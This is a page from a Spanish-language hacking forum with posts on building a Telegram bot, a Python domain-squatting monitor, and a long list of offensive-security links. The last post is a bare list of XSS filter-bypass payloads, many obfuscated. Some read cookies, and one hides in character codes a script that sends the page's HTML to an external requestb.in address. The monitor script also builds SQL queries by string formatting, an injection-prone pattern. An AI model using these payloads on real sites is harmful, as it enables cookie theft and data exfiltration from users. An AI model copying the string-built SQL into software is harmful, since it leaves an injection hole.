| Bienvenido, Invitado |
Tienes que registrarte para poder participar en nuestro foro.
|
| Usuarios en línea |
Actualmente hay 49 usuarios en línea.
» 0 miembro(s) | 49 invitado(s)
|
| Últimos temas |
Últimos bugs [EN]
Foro: Últimos bugs
Último mensaje por: Bot
02-14-2023, 09:56 AM
» Respuestas: 395
» Vistas: 62,159
|
Últimas herramientas [EN]
Foro: Últimos bugs
Último mensaje por: Bot
02-13-2023, 08:42 PM
» Respuestas: 73
» Vistas: 13,786
|
XSS HUNTER
Foro: Scripts
Último mensaje por: neorichi
12-01-2022, 03:23 PM
» Respuestas: 0
» Vistas: 1,189
|
Telegram BOT
Foro: Python
Último mensaje por: admin
12-01-2022, 09:35 AM
» Respuestas: 0
» Vistas: 745
|
Domain squatting
Foro: Python
Último mensaje por: admin
12-01-2022, 09:22 AM
» Respuestas: 0
» Vistas: 689
|
Advanced SQL Injection Ch...
Foro: SQLi
Último mensaje por: admin
12-01-2022, 09:15 AM
» Respuestas: 0
» Vistas: 639
|
Guía de inspiración
Foro: ¿Cómo empezar?
Último mensaje por: admin
11-30-2022, 05:16 PM
» Respuestas: 0
» Vistas: 1,253
|
JS a otros idiomas (bypas...
Foro: XSS
Último mensaje por: admin
11-30-2022, 04:59 PM
» Respuestas: 0
» Vistas: 674
|
Escape JavaScript generat...
Foro: XSS
Último mensaje por: admin
11-30-2022, 04:54 PM
» Respuestas: 0
» Vistas: 601
|
Payloads 1
Foro: XSS
Último mensaje por: admin
11-30-2022, 04:27 PM
» Respuestas: 0
» Vistas: 712
|
|
|
| Telegram BOT |
|
Enviado por: admin - 12-01-2022, 09:35 AM - Foro: Python
- Sin respuestas
|
 |
Telegram Bot
En este post voy a explicar cómo crear un bot de telegram y cómo obtener el id del chat.
Preparación
Instalar python3 y pip3
Código: sudo apt install python3
Código: sudo apt install python3-pip
Instalar las dependencias a través de pip3:
Código: pip3 install python-telegram-bot
Creación de BotChat
Para el desarrollo de nuestro bot hay que hacer uso de "The Botfather" (https://core.telegram.org/bots) que consiste en una aplicación creada por Telegram que actuará como mediador entre Telegram y nuestro código.
Para ello, debes acceder al canal "BotFather" a través de una de las plataformas que ofrece Telefram (iOS, Android o Windows) o (Mac, Windows, Linux, versión web). En este caso, utilizaré su versión web (https://web.telegram.org/)
![[Imagen: 2017-12-12-09_28_48-Telegram-Web.png]](https://securitytrooper.com/wp-content/uploads/2017/12/2017-12-12-09_28_48-Telegram-Web.png)
Una vez dentro de ese canal, sólo tienes que poner "/start" y luego "/newbot" y después introducir el nombre de tu bot, recuerda que tiene que ir con "_bot" o "bot".
![[Imagen: 2017-12-12-09_55_25-Telegram-Web.png]](https://securitytrooper.com/wp-content/uploads/2017/12/2017-12-12-09_55_25-Telegram-Web.png)
Con el mensaje anterior, confirmaremos que todo se ha creado correctamente. Es muy importante que tengamos nuestro Bot en contactos porque necesitarás saber el chat_id que tenemos en común. Seguramente hay formas de conseguir este "chat_id" más sencillas pero voy a explicar la que yo uso.
Este script te ayudará a conseguir el chat_id pero para que funcione tienes que haber hablado (previamente) con tu bot.
Código: # -*- coding: utf-8 -*-
import telegram
#TOKEN de la API - Botfather
TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
bot = telegram.Bot(token=TOKEN)
updates = bot.get_updates()
print([u.message.chat_id for u in updates])
El chat_id será del estilo de 17XXXXX. Este chat_id también puede ser un valor negativo (por ejemplo, -17XXXXXX).
Fuente: https://github.com/Neorichi/telegramWhisper
|
|
|
| Domain squatting |
|
Enviado por: admin - 12-01-2022, 09:22 AM - Foro: Python
- Sin respuestas
|
|
Domain squatting basado en los últimos dominios registrados en todo el mundo utilizando la base de datos whoisds (basado en Python3)
Código: # -*- coding: utf-8 -*-
import bs4, requests, re, zipfile, io, sys
from urllib.request import urlopen
import urllib.request
import pymysql
import time
import json
import telegram
import datetime
from difflib import SequenceMatcher
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import Updater, CommandHandler, CallbackQueryHandler
from telegram import ReplyKeyboardMarkup
import urllib.parse
import pyfiglet
_headers_get = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
}
#### Global ####
#Tags to search
tags = []
#Time to waint betewen request tag
time_tag = 600
#Ratio equal tag and email
ratio = 0.620
#### DB Config ####
host="xxxx.xxxx.us-east-1.rds.amazonaws.com"
port=3306
dbname="xxxxx"
user="xxxxx"
password="xxxxxx"
#Example schema table
'''
CREATE TABLE `domains` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`link` varchar(250) COLLATE utf8_bin NOT NULL,
`emails` blob,
`created_at` timestamp NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
'''
#### Telegram Config #### [Optional]
telegram_on = False
TOKEN = 'xxxxx:xxxx-xxx'
mi_canal = 111111
def addslashes(s):
return s.replace("'", '"')
def getDomains(tags,conn):
if telegram_on:
mi_bot = telegram.Bot(token=TOKEN)
mi_bot_updater = Updater(mi_bot.token)
urls = []
array_d = []
result = requests.get("https://whoisds.com/newly-registered-domains",headers=_headers_get)
c = result.content
soup = bs4.BeautifulSoup(c, "html.parser")
table = soup.find("table", {"class":"table-bordered"})
tr = soup.findAll('tr')[1]
a = tr.find('a')
link = str(a['href'])
with conn.cursor() as cur:
exist = cur.execute('select link from domains where link = "%s" LIMIT 1' % (link))
if exist==0:
r = requests.get(link,headers=_headers_get, stream=True)
zfile = zipfile.ZipFile(io.BytesIO(r.content))
for finfo in zfile.infolist():
ifile = zfile.open(finfo)
urls = ifile.readlines()
for url_value in urls:
for tag in tags:
domain = url_value.strip().decode("utf-8")
if (float(ratio) <= float(SequenceMatcher(None, domain, tag).ratio())):
if domain not in array_d:
array_d.append(domain)
print("-------")
print(link)
print(array_d)
emails_json = addslashes(str(json.dumps(array_d)))
cur.execute("insert into domains (link, emails) values('%s', '%s')" % (link,emails_json))
conn.commit()
if telegram_on:
try:
mi_bot.sendMessage(chat_id=mi_canal, text="--------"+datetime.datetime.now().strftime("%H:%M %d/%m/%y")+"---------")
mi_bot.sendMessage(chat_id=mi_canal, text=("%s" % str(link)))
mi_bot.sendMessage(chat_id=mi_canal, text=("%s" % str(array_d)))
except Exception as e:
pass
return True
def main():
ascii_banner = pyfiglet.figlet_format("DomainWhisper")
print("\n"+ascii_banner)
conn = pymysql.connect(host, user=user,port=port,passwd=password, db=dbname)
try:
tags_sys = str(sys.argv[1])
if tags_sys:
tags.clear()
tags_ = str(tags_sys)
tags_ = tags_.split(",")
for value in tags_:
tags.append(value)
except Exception as e:
pass
while True:
print(datetime.datetime.now().strftime("%H:%M %d/%m/%y"))
print("Tags: %s" % str(tags))
# Search
getDomains(tags,conn)
time.sleep(time_tag)
if __name__ == "__main__":
main()
Fuente: https://github.com/Neorichi/domainWhisper
|
|
|
|
| Guía de inspiración |
|
Enviado por: admin - 11-30-2022, 05:16 PM - Foro: ¿Cómo empezar?
- Sin respuestas
|
|
MISC
Information
Vulnerabilities knowledge database
https://portswigger.net/kb/issues
JSON Hijacking
Keywords: JSON, hijacking
https://haacked.com/archive/2009/06/25/j...king.aspx/
Compilation of Facebook bug bounty writeups
Keywords: Facebook, compilation, writeup, bug bounty
https://www.facebook.com/notes/phwd/face...202701640/
Post / Examples
How I Hacked Facebook, and Found Someone's Backdoor Script
Keywords: SQLi, Facebook, RCE
http://devco.re/blog/2016/04/21/how-I-ha...t-eng-ver/
How to Detect HTTP Parameter Pollution Attacks
https://www.acunetix.com/blog/whitepaper...pollution/
Active Directory
Information
A Red Teamer’s Guide to GPOs and OUs
Keywords: AD, red team, group policy
https://wald0.com/?p=179
Abusing GPO Permissions
Keywords: AD, red team, GPO, group policy
https://blog.harmj0y.net/redteaming/abus...rmissions/
https://www.harmj0y.net/blog/redteaming/...rmissions/]
Posts / Examples
Kerberoasting Without Mimikatz
Keywords: Kerberos, AD
https://blog.harmj0y.net/blog/powershell...t-mimikatz
Android
Posts / Examples
Breaking The Facebook For Android Application
Keywords: Android, deeplink
https://ash-king.co.uk/facebook-bug-bounty-09-18.html
Hacking android apps with Frida I
Keywords: Frida, Android, DBI
https://www.codemetrix.net/hacking-andro...h-frida-1/
Hacking a game to learn FRIDA basics (Pwn Adventure 3)
Keywords: Frida, Android, game hacking
https://x-c3ll.github.io/posts/Frida-Pwn-Adventure-3/
Authentication / Authorization
Posts / Examples
Gaining access to private topics using quoting feature
Keywords: Discourse, authorization bypass, forum
https://hackerone.com/reports/312647
Getting any Facebook user's friend list and partial payment card details
Keywords: Facebook, authorization, GraphQL
https://www.josipfranjkovic.com/blog/fac...tcard-leak
AWS
Information
AWS Post Exploitation – Part 1
Keywords: aws, aws-cli
https://cloudsecops.com/aws-post-exploitation-part-1/
EC2 - Instance Metadata and User Data
Keywords: EC2
http://docs.aws.amazon.com/AWSEC2/latest...adata.html
How to perform S3 domain takeover
Keywords: S3, domain takeover
S3 bucket policy:
Código: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "PublicReadGetObject",
"Effect": "Allow",
"Principal": "*",
"Action": [
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::exampledomain.com/*"
]
}
]
}
Posts / Examples
Tools
AWS pwn
Keywords: AWS
https://github.com/dagrz/aws_pwn
Scout2 - Security auditing tool for AWS environments
Keywords: AWS, Scout2, NCC
https://github.com/nccgroup/Scout2
Zeus - AWS Auditing & Hardening Tool
Keywords: AWS, hardening
https://github.com/DenizParlak/Zeus
https://github.com/RhinoSecurityLabs/pacu
https://github.com/andresriancho/nimbostratus
https://github.com/Ucnt/aws-s3-bruteforce
https://github.com/JR0ch17/S3Cruze
CORS
Information
HTTP access control (CORS)
Keywords: CORS
https://developer.mozilla.org/en-US/docs...ntrol_CORS
Posts / Examples
Exploiting CORS Misconfigurations for Bitcoins and Bounties
Keywords: CORS
http://blog.portswigger.net/2016/10/expl...s-for.html
Pre-domain wildcard CORS Exploitation
Keywords: CORS
https://medium.com/@arbazhussain/pre-dom...6ac1d4bd30
Crypto
Information
https://sites.google.com/site/cryptocrackprogram
https://r12a.github.io/uniview
https://github.com/nccgroup/featherduster
Posts / Examples
CBC "cut and paste" attack may cause Open Redirect (even XSS)
Keywords: CBC, crypto, redirect, token
https://hackerone.com/reports/126203
CSRF / SOP / CSP
Information
Authoritative guide to CORS (Cross-Origin Resource Sharing) for REST APIs
Keywords: CSRF
https://www.moesif.com/blog/technical/co...REST-APIs/
Posts / Examples
Exploiting CSRF on JSON endpoints with Flash and redirects
Keywords: CSRF, JSON
https://blog.appsecco.com/exploiting-csr...1d4ad6b31b
CSRF in 'set.php' via age causes stored XSS
Keywords: Rockstar, CSRF, XSS
https://hackerone.com/reports/152013
Plain text considered harmful: A cross-domain exploit
Keywords: SOP, JSONP, CSRF, Javascript
http://balpha.de/2013/02/plain-text-cons...n-exploit/
Bypass Same Origin Policy - BY-SOP (Challenge + explanations)
Keywords: SOP
https://github.com/mpgn/ByP-SOP/
Tools
Cloud (generic)
Posts / Examples
Hacking the Cloud
Keywords: Azure, AWS, Active Directory (AD)
https://adsecurity.org/wp-content/upload...-Final.pdf
Bypassing and exploiting Bucket Upload Policies and Signed URLs
Keywords: buckets, AWS, Google Cloud (GCP)
https://labs.detectify.com/2018/08/02/by...gned-urls/
Csv injection
Information
Posts / Examples
Comma separated vulnerabilities
Keywords: Openoffice, Libreoffice, Excel, export to csv
https://www.contextis.com/resources/blog...abilities/
Everything about the CSV Excel Macro Injection
Keywords: Excel, macro injection
http://blog.securelayer7.net/how-to-perf...injection/
Exploiting ‘Export as CSV’ functionality:The road to CSV Injection
Keywords: export as csv
http://www.tothenew.com/blog/csv-injection/
Cloud Security Risks (P2): CSV Injection in AWS CloudTrail
Keywords: AWS
https://rhinosecuritylabs.com/aws/cloud-...loudtrail/
http://blog.zsec.uk/csv-dangers-mitigations/
Bluetooth
Posts / Examples
Reversing and exploiting BLE 4.0 communication
Keywords: BLE, Bluetooth
http://payatu.com/reversing-exploiting-b...unication/
How to capture Bluetooth packets on Android 4.4
Keywords: BLE, Bluetooth, Android
https://www.nowsecure.com/blog/2014/02/0...droid-4-4/
This Is Not a Post About BLE, Introducing BLEAH
Keywords: BLE, Bluetooth
https://www.evilsocket.net/2017/09/23/Th...ing-BLEAH/
Desktop apps / Binaries
Information
Posts / Examples
XSS to RCE in Atlassian Hipchat
Keywords: RCE, XSS, Desktop, Electron
https://maustin.net/2015/11/12/hipchat_rce.html
Modern Alchemy: Turning XSS into RCE
Keywords: RCE, XSS, Desktop, Electron
https://blog.doyensec.com/2017/08/03/ele...urity.html
Tools
Directory/path traversal
Information
Directory Traversal Checklist
Keywords: checklist, path traversal, directory traversal
● 16 bit Unicode encoding:
● = %u002e, / = %u2215, \ = %u2216
● Double URL encoding:
●. = %252e, / = %252f, \ = %255c
● UTF-8 Unicode encoding:
●. = %c0%2e, %e0%40%ae, %c0ae, / = %c0%af, %e0%80%af, %c0%2f, \ = %c0%5c, %c0%80%5c
Django / Python
Information
Posts / Examples
Exploring server-side template injection in Flask Jinja2
Keywords: Flask, Jinja2
https://nvisium.com/blog/2016/03/09/expl...sk-jinja2/
Injecting Flask
Keywords: Flask
https://nvisium.com/blog/2015/12/07/injecting-flask/
Uber 遠端代碼執行- Uber.com Remote Code Execution via Flask Jinja2 Template Injection
Keywords: Flask, Jinja2
http://blog.orange.tw/2016/04/bug-bounty...ode_7.html
Tools
Ethereum
Posts / Examples
Thinking About Smart Contract Security
https://blog.ethereum.org/2016/06/19/thi...-security/
Exploiting
Information / Training
Linux Heap Exploitation Intro Series: Used and Abused – Use After Free
Keywords: use after free
https://sensepost.com/blog/2017/linux-he...fter-free/
Return oriented programming
Keywords: ROP, training
https://ropemporium.com/
Hunting In Memory
Keywords: shellcode injection, reflective DLL injection, memory module, process and module hollowing, Gargoyle (ROP/APC)
https://www.endgame.com/blog/technical-b...ing-memory
File upload / image upload
Posts / Examples
forum.getmonero.org Shell upload
Keywords: image upload, forum, php, shell, exif
https://hackerone.com/reports/357858
Google Cloud Platform
Tools
AWS pwn
Keywords: AWS
https://github.com/dagrz/aws_pwn
Google web toolkit (GWT)
From Serialized to Shell :: Auditing Google Web Toolkit
Keywords: GWT, RCE, serialization
https://srcincite.io/blog/2017/04/27/fro...olkit.html
HTTP Headers
Practical HTTP Host header attacks
Keywords: HTTP Headers, Host, cache poisoning
http://www.skeletonscribe.net/2013/05/pr...tacks.html
HTTP request smuggling
HTTP Desync Attacks: Request Smuggling Reborn
Keywords: smuggling, HTTP pipelining
https://portswigger.net/research/http-de...ing-reborn
iOS
Information / Tips
“Easy network monitoring on non jailbroken iOS:
1/ connect your iOS device to your macOS via USB
2/ rvictl -s <UDID]
3/ tcpdump|wireshark -i rvi0”
IoT / Hardware
Posts / Examples
Philips Hue Reverse Engineering (BH Talk ‘A Lightbulb Worm?’)
Keywords: Philips hue, IoT, Zigbee
http://colinoflynn.com/2016/08/philips-h...-hat-2016/
A Red Team Guide for a Hardware Penetration Test: Part 1
Keywords: Hardware, router, iot
https://adam-toscher.medium.com/a-red-te...14692da9a1
Tools
JWT (Json Web Token)
Information
JWT (JSON Web Token) (in)security
Keywords: JWT, json web tokens
https://research.securitum.com/jwt-json-...-security/
Posts / Examples
Critical Vulnerability Uncovered in JSON Encryption
Keywords: JWT, json
http://blogs.adobe.com/security/2017/03/...ption.html
Tools
LFI/RFI
Information
https://highon.coffee/blog/lfi-cheat-sheet/
https://www.hackthis.co.uk/articles/shel...elfenviron
https://blog.g0tmi1k.com/2012/02/kioptri...ocal-file/
Posts / Examples
LOCAL FILE READ VIA XSS IN DYNAMICALLY GENERATED PDF
Keywords: XSS, LFI, pdf generator, pdf
http://www.noob.ninja/2017/11/local-file...cally.html
PHP Remote File Inclusion command shell using data://
Keywords: PHP, RFI, LFI, URI
https://www.idontplaydarts.com/2011/03/p...ta-stream/
NodeJS / Javascript server-side
Posts / Examples
[demo.paypal.com] Node.js code injection (RCE)
Keywords: Paypal, Node, NodeJS, RCE
http://artsploit.blogspot.com.es/2016/08/pprce2.html
Exploiting Node.js deserialization bug for Remote Code Execution
Keywords: Node, NodeJS, RCE
https://opsecx.com/index.php/2017/02/08/...execution/
OAUTH
Information
Starting with OAuth 2.0 – Security Check && Secure OAuth 2.0: What Could Possibly Go Wrong?
Keywords: OAuth
https://www.securing.pl/en/starting-with...index.html
https://www.securing.pl/en/secure-oauth-...index.html
Posts / Examples
Login CSRF + Open Redirect -] Account Takeover
Keywords: Uber, CSRF, account takeover, Oauth theft
http://ngailong.com/uber-login-csrf-open...-takeover/
Tools
Open redirects
Information
Open Url Redirects
Keywords: open redirect, location
https://zseano.com/tutorials/1.html
Posts / Examples
Airbnb – Chaining Third-Party Open Redirect into Server-Side Request Forgery (SSRF) via LivePerson Chat
Keywords: SSRF
http://buer.haus/2017/03/09/airbnb-chain...rson-chat/
Powershell / Windows CMD
Information
15 Ways to Bypass the PowerShell Execution Policy
Keywords: Powershell, policy, bypass
https://blog.netspi.com/15-ways-to-bypas...on-policy/
DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques
Keywords: cmd.exe, obfuscation, windows
https://www.fireeye.com/content/dam/fire...report.pdf
Physical attacks / USB / HARDWARE
Information
Posts / Examples
Real-world Rubber Ducky attacks with Empire stagers
Keywords: Empire, Rubber Ducky, USB
https://www.sc0tfree.com/sc0tfree-blog/o...re-stagers
Red team exercises
Information
Red team tips
Keywords: red team, tips
https://vincentyiu.co.uk/red-team-tips/
Posts / Examples
From APK to Golden Ticket
Keywords: red team, apk, golden ticket
https://docs.google.com/document/d/1XWzl...zyxPfyW4GQ
Restricted shells
Information
Escape From SHELLcatraz - Breaking Out of Restricted Unix Shells
Keywords: shell escapes, restricted shell
https://speakerdeck.com/knaps/escape-fro...nix-shells
Restricted Linux Shell Escaping Techniques
Keywords: shell escapes, restricted shell
https://fireshellsecurity.team/restricte...echniques/
RCE
Information
Server-side Template injection / SSTI
Keywords: template, Mako, Jinja, Twig, Smarty
https://web-in-security.blogspot.co.uk/2...sheet.html
XXE payloads
Keywords: XXE, payloads, injection
https://gist.github.com/staaldraad/01415b990939494879b4
Exploitation: XML External Entity (XXE) Injection
Keywords: XXE
https://depthsecurity.com/blog/exploitat...-injection
XXE: How to become a Jedi
Keywords: XXE
https://www.slideshare.net/ssuserf09cba/...ome-a-jedi
Hunting in the Dark - Blind XXE
Keywords: XXE, blind
https://blog.zsec.uk/blind-xxe-learning/amp/
Playing with Content-Type – XXE on JSON Endpoints
Keywords: XXE, json, content-type
https://blog.netspi.com/playing-content-...endpoints/
XML Vulnerabilities and Attacks cheatsheet
Keywords: XXE, Cheatsheet
https://gist.github.com/mgeeky/4f726d3b3...19c9004870
Posts / Examples
XML External Entity Injection in Jive-n (CVE-2018-5758)
Keywords: XXE, Word, DTD
https://rhinosecuritylabs.com/research/x...2018-5758/
Cheatsheets (to be cleaned)
All in one References / Full blogs/sites
http://pwnwiki.io/#!index.md
https://jivoi.github.io/2015/07/01/pente...nd-tricks/
https://philippeharewood.com/
OSCP Reviews
http://www.abatchy.com/2017/03/how-to-pr...-noob.html
https://www.securitysift.com/offsec-pwb-oscp/
Enumeration Cheatsheet
https://highon.coffee/blog/nmap-cheat-sheet/
https://highon.coffee/blog/penetration-t...eat-sheet/
http://www.0daysecurity.com/penetration-...ation.html
Privilege Escalation
https://blog.g0tmi1k.com/2011/08/basic-l...scalation/
https://github.com/rebootuser/LinEnum
https://www.securitysift.com/download/li...checker.py
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://pentest.blog/windows-privilege-e...entesters/
https://www.youtube.com/watch?v=kMG8IsCohHA
http://www.fuzzysecurity.com/tutorials/16.html
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://github.com/51x/WHP
https://isc.sans.edu/diary/Windows+Comma...+WMIC/1229
Abusing SUDO (Linux Privilege Escalation)
http://touhidshaikh.com/blog/?p=790
Reverse Shell Cheatsheet
https://www.phillips321.co.uk/2012/02/05...eat-sheet/
https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
Get TTY shell
https://blog.ropnop.com/upgrading-simple...tive-ttys/
https://netsec.ws/?p=337
Buffer Overflow
https://www.corelan.be/index.php/2009/07...overflows/
http://netsec.ws/?p=180
Msfvenom Cheatsheet
http://security-geek.in/2016/09/07/msfve...eat-sheet/
Porting Metasploit Exploits
https://netsec.ws/?p=262
Port forwarding & Pivoting
https://artkond.com/2017/03/23/pivoting-guide/
http://atropineal.com/2016/11/18/pivotin...oxychains/
http://netsec.ws/?p=278
Client-Side Attacks
https://www.offensive-security.com/metas...-exploits/
Practice
https://www.hackthebox.eu/
https://www.vulnhub.com/
https://exploit-exercises.com/
https://shellterlabs.com/en/
|
|
|
|
| Payloads 1 |
|
Enviado por: admin - 11-30-2022, 04:27 PM - Foro: XSS
- Sin respuestas
|
|
Código: <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<embed src=/x//alert(1)><base href="javascript:\
https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>
</script><script src=/ñ.xyz>
<script src=//u00f1.xyz>
†‡•<img src=a onerror=javascript:alert('hacked')>…‰€
< and >
<script>prompt(1)</script>
<script>confirm(1)</script>
<script> var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk=')); </script>
<script> var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk=')); /script>
<script> var fn=window[atob('ZXZhbA==')]; fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script>
<script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>
<script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script>
<script>throw~delete~typeof~prompt(1)</script>
<script>delete[a=alert]/prompt a(1)</script>
<script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>
<script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script>
<script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch mport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>
<script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script>
<script>Array.from`${eval}alert\`1\``</script>
<script>Array.from([1],alert)</script>
<script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u>
<videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script>
<script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script>
<script>x=new class extends Function{}('alert(1)'); x=new x;</script>
<script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>
<script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1)
<svg><script/xlink:href=data:,alert(1)></script>
<frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>
<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
<script>alert(1)//
<script>alert(1)<!–
http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
</ScRiPt><svg onload=alert(1)
</ScRiPt><svg onload=alert(1)%20
</ScRiPt><svg onload=prompt(1)%20
asd%27%3Balert%28%27XSS%27%29%3B%27
%3C%68%31%3E%54%68%69%73%20%69%73%20%61%20%74%65%73%74%3C%2F%68%31%3E
<script>alert(document.cookie)</script><
javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));
javascript:eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<img src='nonexistant' onerror='eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))' />
\uFE64%\uFF1Cscript/src=//...?
"><img src=x onerror=alert(document.domain)>
<%<script/src="//...?" class="badLink"
<form action="javasc
ript:eval(String.fromCharCode(118,97,114,32,109,97,114,107,117,112,61,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,46,105,110,110,101,114,72,84,77,76,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,115,122,54,113,104,97,115,122,63,116,101,120,116,61,34,43,101,110,99,111,100,101,85,82,73,40,109,97,114,107,117,112,41,46,115,117,98,115,116,114,105,110,103,40,48,44,55,48,48,41))"><button>Click</button></form>
|
|
|
|
|
